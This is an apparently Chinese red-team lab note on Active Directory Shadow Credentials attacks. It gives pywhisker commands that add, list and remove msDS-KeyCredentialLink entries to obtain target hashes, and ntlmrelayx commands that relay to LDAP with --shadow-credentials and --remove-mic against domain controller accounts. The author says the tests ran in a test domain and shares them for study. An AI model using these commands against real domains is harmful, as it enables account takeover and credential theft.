上周的测试记录,可能有错漏的地方,暂时不改发出来吧。
下面所有操作,尽在测试环境完成。仅供参考
谁能新增
给哪个受害者新增(高价值目标)
这里的win7是域管(之前某次测试中提权了)
msDS-KeyCredentialLink
属性//add
python3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "add" -o test1 --dc-ip dc3.bsec.corp
获取目标Win10 hash
KeyCredentialLink
//list
python3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "list" -o test1 --dc-ip dc3.bsec.corp
//del
python3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "remove" --device-id fcfce57f-eddb-e428-18c3-a844f750fc05 --dc-ip dc3.bsec.corp
目标
新增msDS-KeyCredentialLink
属性
利用环节: 获取目标ex03 hash
DC2$(AD CS)
编辑win10的KeyCredentialLink
Ex03$
编辑win10的KeyCredentialLink
DC2$(AD CS)
编辑DC3$
的KeyCredentialLink
win8
编辑win8(自己)
的KeyCredentialLink
iis$
编辑iis$(自己)
的KeyCredentialLink
msDS-KeyCredentialLink
DC2$
(无签名)默认server不会有webdav,我是之前测试刚好安装&启动了的
python3 ntlmrelayx.py --shadow-credent --shadow-target 'dc2$' -t ldap://dc4 --remove-mic
拿着pfx
,玩法同上
efs+smb(remove-mic
有签名) 打PC147-WIN7SP1$
邮件打域管理(无签名)
-->打所有机器和域用户 (操作同之前文章)
和其他relay操作类似, 前置条件ok的情况下打
用户&机器账号
,场景更广,组合拳更多,并且还可以拿到ntlmhash
.AD CS Web
也有一些组合拳玩.relay
知识星球: 红蓝早读 (碎片记录)
公众号: 甲方安全建设 (整理沉淀)
作者: red4blue (交流讨论)
公众号增改字数和次数有限,防御检测策略,其它拓展思考,可能会留到群里讨论,留到星球沉淀.